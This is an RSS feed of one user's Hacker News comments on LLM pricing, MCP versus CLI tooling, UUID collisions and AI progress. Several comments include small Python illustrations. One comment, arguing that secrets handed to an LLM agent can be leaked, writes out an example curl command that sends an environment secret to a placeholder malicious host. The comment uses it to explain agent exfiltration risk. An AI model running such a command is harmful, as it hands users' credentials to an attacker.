<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hacker News: crazylogger</title><link>https://news.ycombinator.com/user?id=crazylogger</link><description>Hacker News RSS</description><docs>https://hnrss.org/</docs><generator>hnrss v2.1.1</generator><lastBuildDate>Thu, 28 May 2026 13:13:33 +0000</lastBuildDate><atom:link href="https://hnrss.org/user?id=crazylogger" rel="self" type="application/rss+xml"></atom:link><item><title><![CDATA[What we learned building sandbox for document agents]]></title><description><![CDATA[
<p>Article URL: <a href="https://blog.yfzhou.fyi/posts/doc-sandbox/">https://blog.yfzhou.fyi/posts/doc-sandbox/</a></p>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=48192600">https://news.ycombinator.com/item?id=48192600</a></p>
<p>Points: 1</p>
<p># Comments: 0</p>
]]></description><pubDate>Tue, 19 May 2026 12:48:04 +0000</pubDate><link>https://blog.yfzhou.fyi/posts/doc-sandbox/</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=48192600</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48192600</guid></item><item><title><![CDATA[New comment by crazylogger in "GPT-5.5 Price Increase: What It Costs"]]></title><description><![CDATA[
<p>OpenRouter may see you fire hundreds of requests at them, but they have no idea that "these 50 requests here at 4PM are for task A", "those 100 requests there do task B", etc. So it's a shallow analysis at the "overall request shape" level.</p>
]]></description><pubDate>Fri, 08 May 2026 15:21:58 +0000</pubDate><link>https://news.ycombinator.com/item?id=48064447</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=48064447</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48064447</guid></item><item><title><![CDATA[New comment by crazylogger in "Ask HN: We just had an actual UUID v4 collision..."]]></title><description><![CDATA[
<p>For a single database using UUIDs, yes, it's astronomically rare. But it's quite a different thing to say that no computer system on Earth has ever experienced a UUID collision. The number of systems out there is also astronomical.</p>
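<p>A rough sketch of the per-system vs. all-systems distinction, using the standard birthday-bound approximation. It assumes ideally random version-4 UUIDs (122 random bits) and independent systems; the function names and the counts plugged in at the end are made up for illustration, not measurements.</p>

```python
import math

UUID4_RANDOM_BITS = 122  # a version-4 UUID carries 122 random bits


def collision_probability(n_ids: int, bits: int = UUID4_RANDOM_BITS) -> float:
    """Birthday-bound approximation: p ~= 1 - exp(-n(n-1) / (2 * 2**bits))."""
    space = 2 ** bits
    exponent = n_ids * (n_ids - 1) / (2 * space)
    return -math.expm1(-exponent)  # 1 - exp(-exponent), stable for tiny values


def any_system_collides(n_systems: int, ids_per_system: int) -> float:
    """Chance that at least one of n independent systems sees a collision."""
    p = collision_probability(ids_per_system)
    if p == 1.0:
        return 1.0
    # 1 - (1 - p)**n_systems, computed without losing precision for tiny p
    return -math.expm1(n_systems * math.log1p(-p))


# Hypothetical inputs: one database with a billion IDs, then a million such databases.
print(collision_probability(10**9))
print(any_system_collides(10**6, 10**9))
```

<p>For small probabilities the aggregate grows roughly linearly with the number of systems, so the answer depends heavily on how many systems and IDs you assume.</p>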
]]></description><pubDate>Fri, 08 May 2026 15:04:49 +0000</pubDate><link>https://news.ycombinator.com/item?id=48064242</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=48064242</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48064242</guid></item><item><title><![CDATA[New comment by crazylogger in "Microsoft and OpenAI end their exclusive and revenue-sharing deal"]]></title><description><![CDATA[
<p>People had this "why you probably can't run a GPT-4 (or even GPT-3.5) class model on your MBP anytime soon" conversation before.<p>Today's LLMs are able to pack much more capability into fewer parameters compared to 2023. We might still be at the very rudimentary phase of this technology; there are low-hanging efficiency gains to be had left and right. These models consume many orders of magnitude more energy than a human brain, which all looks like room for improvement.<p>The right question: is there a law in information theory that fundamentally prevents a 70B model of any architecture from being as smart as Opus 4.7?</p>
]]></description><pubDate>Tue, 28 Apr 2026 02:21:16 +0000</pubDate><link>https://news.ycombinator.com/item?id=47929823</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47929823</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47929823</guid></item><item><title><![CDATA[New comment by crazylogger in "Amateur armed with ChatGPT solves an Erdős problem"]]></title><description><![CDATA[
<p>"Hi ChatGPT, propose and prove something radically new in the genre of Gödel's theorem."<p>How is this not just another proposed problem (albeit with a search space much larger than an Erdős problem's)?</p>
]]></description><pubDate>Sun, 26 Apr 2026 06:18:25 +0000</pubDate><link>https://news.ycombinator.com/item?id=47907850</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47907850</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47907850</guid></item><item><title><![CDATA[New comment by crazylogger in "DeepSeek v4"]]></title><description><![CDATA[
<p>I haven't seen anyone claiming that API prices are subsidized.<p>At some point (from the very beginning till ~2025Q4) Claude Code's usage limit was so generous that you could get roughly $10~20 (API-price-equivalent) worth of usage out of a $20/mo Pro plan <i>each day</i> (2 * 5h window) - and for good reason: LLM agentic coding is extremely token-heavy, so people simply wouldn't return to Claude Code a second time if the provided usage weren't generous or if every prompt cost $1. And then Codex started trying to poach Claude Code users by offering even greater limits and constantly resetting everyone's limit in recent months. The API price would have to be 30x operating cost to make this not a subsidy. <i>That</i> would be an extraordinary claim.</p>
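<p>The arithmetic behind that multiple, as a quick sketch. The 30-day month and the function name are assumptions for illustration; the dollar figures are the rough ones quoted above.</p>

```python
def subsidy_multiple(usage_per_day_usd: float, plan_price_usd: float,
                     days_per_month: int = 30) -> float:
    """API-price-equivalent usage per month divided by the monthly plan price."""
    return usage_per_day_usd * days_per_month / plan_price_usd


low = subsidy_multiple(10, 20)   # $10/day of usage on a $20/mo plan
high = subsidy_multiple(20, 20)  # $20/day of usage on a $20/mo plan
print(f"{low:.0f}x to {high:.0f}x")  # prints "15x to 30x"
```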
]]></description><pubDate>Fri, 24 Apr 2026 07:29:34 +0000</pubDate><link>https://news.ycombinator.com/item?id=47886827</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47886827</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47886827</guid></item><item><title><![CDATA[New comment by crazylogger in "DeepSeek v4"]]></title><description><![CDATA[
<p>Training data == source code, training algorithm == compiler, model weights == compiled binary.</p>
]]></description><pubDate>Fri, 24 Apr 2026 06:15:24 +0000</pubDate><link>https://news.ycombinator.com/item?id=47886266</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47886266</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47886266</guid></item><item><title><![CDATA[New comment by crazylogger in "Sam Altman may control our future – can he be trusted?"]]></title><description><![CDATA[
<p>If all they do is "just" brute-force problem solving, then they are already bound to take over R&D & other knowledge work and exponentially accelerate progress, i.e. the SciFi "singularity" BS ends up happening all the same. Whether we classify them as true reasoning is just semantics.</p>
]]></description><pubDate>Tue, 07 Apr 2026 01:42:04 +0000</pubDate><link>https://news.ycombinator.com/item?id=47669740</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47669740</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47669740</guid></item><item><title><![CDATA[New comment by crazylogger in "Claude Code's source code has been leaked via a map file in their NPM registry"]]></title><description><![CDATA[
<p>Why would this be in the client code though?</p>
]]></description><pubDate>Tue, 31 Mar 2026 14:18:39 +0000</pubDate><link>https://news.ycombinator.com/item?id=47587770</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47587770</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47587770</guid></item><item><title><![CDATA[New comment by crazylogger in "Improving Composer through real-time RL"]]></title><description><![CDATA[
<p>This feels so wrong. The LLM should play the role of a very general (but empty & un-opinionated) brain - you don’t want to perform a coding-specific lobotomy on someone every day. The proper target of their RL should have been their harness. That’s what determines the agent's trajectory as much as the base model.<p>I also wonder: since they’re doing constant RL on model weights with <i>today's Cursor design</i>, does that mean they can never change their system prompt & other parts of the harness?<p>1) Comparisons between past trajectory data would be meaningless if the trajectories were produced under different instructions.<p>2) Performance will be terrible the next time they change their tool design, since the model is now "opinionated" based on how a previous version of Cursor was designed.<p>Anthropic is more sensible with their “constitution” approach to safety. The behaviors (and ultimately the values) you want your model to follow should be a document, not a lobotomy.</p>
]]></description><pubDate>Sat, 28 Mar 2026 02:30:21 +0000</pubDate><link>https://news.ycombinator.com/item?id=47550961</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47550961</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47550961</guid></item><item><title><![CDATA[New comment by crazylogger in "When does MCP make sense vs CLI?"]]></title><description><![CDATA[
<p>MCP solves a very specific problem: how do you ship an LLM tool/function so that it is callable by an LLM in an inter-process manner (so that you don’t need to modify OpenAI’s code to make your tool available in ChatGPT)? CLIs concern what happens inside such tools, namely a `bash` tool. As you can see they are different layers of the same stack.<p>> LLMs don’t need a special protocol ... LLMs are really good at using command-line tools.<p>The author's point only makes sense if LLMs all have a computer built-in - they don't. An LLM only has a command line if it is provided with a command-line tool, and MCP is the standard way to provide tools.<p>If I have to find an analogy for this (nonsensical) MCP vs. CLI framing, it's like someone saying “ditch the browser, use html instead” - what is that supposed to mean?</p>
]]></description><pubDate>Mon, 02 Mar 2026 05:54:59 +0000</pubDate><link>https://news.ycombinator.com/item?id=47214332</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47214332</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47214332</guid></item><item><title><![CDATA[New comment by crazylogger in "Making MCP cheaper via CLI"]]></title><description><![CDATA[
<p>Setting an env var on a machine the LLM has control over <i>is</i> giving it the secret. When the LLM tries `echo $SECRET` or `curl <a href="https://malicious.com/api" rel="nofollow">https://malicious.com/api</a> -H secret:$SECRET` (or any one of infinitely many exfiltration methods possible), how do you plan on telling these apart from normal computer use?<p>Prior art: <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/" rel="nofollow">https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/</a></p>
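<p>A minimal sketch of why this holds: any command the agent runs inherits the environment it was launched with. The variable name DEMO_SECRET, the helper name and the token value are hypothetical, and the child process here is just a stand-in for whatever the model decides to execute.</p>

```python
import os
import subprocess
import sys


def run_agent_command(argv: list[str], secret: str) -> str:
    """Run a command the way a naive harness might: with the secret in its env."""
    env = dict(os.environ, DEMO_SECRET=secret)  # DEMO_SECRET is a made-up name
    result = subprocess.run(argv, env=env, capture_output=True, text=True, check=True)
    return result.stdout.strip()


# Stand-in for a model-chosen command; it simply reads the inherited variable.
leak = [sys.executable, "-c", "import os; print(os.environ['DEMO_SECRET'])"]
print(run_agent_command(leak, "s3cr3t-token"))
```

<p>Nothing in the harness distinguishes this child process from a legitimate one that needs the same variable.</p>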
]]></description><pubDate>Thu, 26 Feb 2026 10:38:24 +0000</pubDate><link>https://news.ycombinator.com/item?id=47164255</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47164255</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47164255</guid></item><item><title><![CDATA[New comment by crazylogger in "Making MCP cheaper via CLI"]]></title><description><![CDATA[
<p>Then you inevitably have to leak your API secret to the LLM in order for it to successfully call the APIs.<p>MCP is a thin toolcall auth layer that has to be there so that ChatGPT and claude.ai can "connect to your Slack", etc.</p>
]]></description><pubDate>Thu, 26 Feb 2026 04:09:50 +0000</pubDate><link>https://news.ycombinator.com/item?id=47161728</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47161728</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47161728</guid></item><item><title><![CDATA[New comment by crazylogger in "A16z partner says that the theory that we’ll vibe code everything is wrong"]]></title><description><![CDATA[
<p>Money is useful mostly for hiring human labor to outcompete others, e.g. Satya Nadella has 100K employees under his command, you don't, so you can't realistically compete with MS today - this is their main moat.<p>If AI renders human labor a cheap commodity (say you can orchestrate a bunch of agents to develop + market a Windows competitor for $1000 of compute), what used to be "Satya + his army vs. you" now becomes mostly a 1:1 fair fight, which favors the startup.</p>
]]></description><pubDate>Sun, 22 Feb 2026 01:46:26 +0000</pubDate><link>https://news.ycombinator.com/item?id=47107239</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=47107239</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=47107239</guid></item><item><title><![CDATA[New comment by crazylogger in "Code is cheap. Show me the talk"]]></title><description><![CDATA[
<p>You are describing traditional (deterministic?) automation before AI. With AI systems as general as today's SOTA LLMs, they'll happily take on the job regardless of the task falling into class I or class II.<p>Ask a robot arm "how should we improve our car design this year", it'll certainly get stuck. Ask an AI, it'll give you a real opinion that's at least on par with a human's opinion. If a company builds enough tooling to complete the "AI comes up with idea -> AI designs prototype -> AI robot physically builds the car -> AI robot test drives the car -> AI evaluates all prototypes and confirms next year's design" feedback loop, then in theory this can work.<p>This is why AI is seen as such a big deal - it's fundamentally different from all previous technologies. To an AI, there is no line that would distinguish class I from II.</p>
]]></description><pubDate>Fri, 30 Jan 2026 16:19:53 +0000</pubDate><link>https://news.ycombinator.com/item?id=46826247</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=46826247</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46826247</guid></item><item><title><![CDATA[New comment by crazylogger in "TimeCapsuleLLM: LLM trained only on data from 1800-1875"]]></title><description><![CDATA[
<p>Or maybe, LLMs <i>are</i> pioneering scientific advancements - people are using LLMs to read papers, choose what problems to work on, come up with experiments, analyze results, and draft papers, etc., at this very moment. Except they eventually stick their human names on the cover so we almost never know.</p>
]]></description><pubDate>Tue, 13 Jan 2026 05:25:07 +0000</pubDate><link>https://news.ycombinator.com/item?id=46597553</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=46597553</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46597553</guid></item><item><title><![CDATA[New comment by crazylogger in "Claude Code CLI was broken"]]></title><description><![CDATA[
<p>Proper vibe coding should involve tons of vibe refactoring.<p>I'd say spending at least a quarter of my vibe coding time on refactoring + documentation refresh to keep the codebase looking impeccable is the only way my projects can work at all long term. We don't want to confuse the coding agent.</p>
]]></description><pubDate>Fri, 09 Jan 2026 03:11:00 +0000</pubDate><link>https://news.ycombinator.com/item?id=46549660</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=46549660</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46549660</guid></item><item><title><![CDATA[New comment by crazylogger in "GPT-5.2-Codex"]]></title><description><![CDATA[
<p>From a couple hours of usage in the CLI, 5.2-codex seems to burn through my plan's limit noticeably faster than 5.1-codex. So I guess the usage limit is a set dollar amount of API credits under the hood.</p>
]]></description><pubDate>Fri, 19 Dec 2025 07:18:59 +0000</pubDate><link>https://news.ycombinator.com/item?id=46323089</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=46323089</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46323089</guid></item><item><title><![CDATA[New comment by crazylogger in "Structured outputs on the Claude Developer Platform"]]></title><description><![CDATA[
<p>Prior to this, the way you got structured output with Claude was via tool use.<p>IMO this was the more elegant design if you think about it: <i>tool calling is really just structured output and structured output is tool calling</i>. The "do not provide multiple ways of doing the same thing" philosophy.</p>
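<p>To illustrate the equivalence, here is a small sketch in which the arguments of a tool call are simply treated as the structured output. The tool name, the schema and the helper are hypothetical and not taken from any vendor's SDK; the validation is deliberately minimal.</p>

```python
import json

# Hypothetical tool definition: a name plus a JSON-Schema-like input description.
EXTRACT_CONTACT_TOOL = {
    "name": "extract_contact",
    "input_schema": {
        "type": "object",
        "properties": {"name": {"type": "string"}, "age": {"type": "integer"}},
        "required": ["name", "age"],
    },
}

PY_TYPES = {"string": str, "integer": int}


def parse_tool_call(raw_arguments: str, tool: dict) -> dict:
    """Validate the JSON arguments of a tool call and return them as the result."""
    schema = tool["input_schema"]
    data = json.loads(raw_arguments)
    for key in schema["required"]:
        if key not in data:
            raise ValueError(f"missing field: {key}")
    for key, value in data.items():
        type_name = schema["properties"][key]["type"]
        if not isinstance(value, PY_TYPES[type_name]):
            raise ValueError(f"wrong type for field: {key}")
    return data


# The model "calls the tool"; the caller never executes anything and just keeps the data.
print(parse_tool_call('{"name": "Ada", "age": 36}', EXTRACT_CONTACT_TOOL))
```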
]]></description><pubDate>Sat, 15 Nov 2025 12:05:15 +0000</pubDate><link>https://news.ycombinator.com/item?id=45936865</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=45936865</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45936865</guid></item><item><title><![CDATA[New comment by crazylogger in "GPT-5-Codex-Mini – A more compact and cost-efficient version of GPT-5-Codex"]]></title><description><![CDATA[
<p>This is just personal experience + reddit anecdotes. I've been using CC from day one (when API pricing was the only way to pay for CC); since then I've been on the $20 Pro plan and am getting a solid $5+ worth of usage in each 5h session, times 5-10 sessions per week (so an overall 5-10x subsidy over one month.) And I extrapolated that $200 subscribers must be getting roughly 10x Pro's usage. I do feel the actual limit fluctuates each week as Claude Code engages in this new subsidy war with OAI Codex though.<p>My theory is this:<p>- we know from benchmarks that open-weight models like DeepSeek R1 and Kimi K2's capabilities are not far behind SOTA GPT/Claude<p>- open-weight API pricing (e.g. on openrouter) is roughly 1/10~1/5 that of GPT/Claude<p>- users can more or less choose to hook their agent CLI/IDEs to either closed or open models<p>If these points are true, then the only reason people are primarily on CC & Codex plans is because they are subsidized by at least 5~10x. When confronted with true costs, users will quickly switch to the lowest inference cost vendor, and we get perfect competition + zero margin for all vendors.</p>
]]></description><pubDate>Sun, 09 Nov 2025 06:51:54 +0000</pubDate><link>https://news.ycombinator.com/item?id=45863491</link><dc:creator>crazylogger</dc:creator><comments>https://news.ycombinator.com/item?id=45863491</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45863491</guid></item></channel></rss>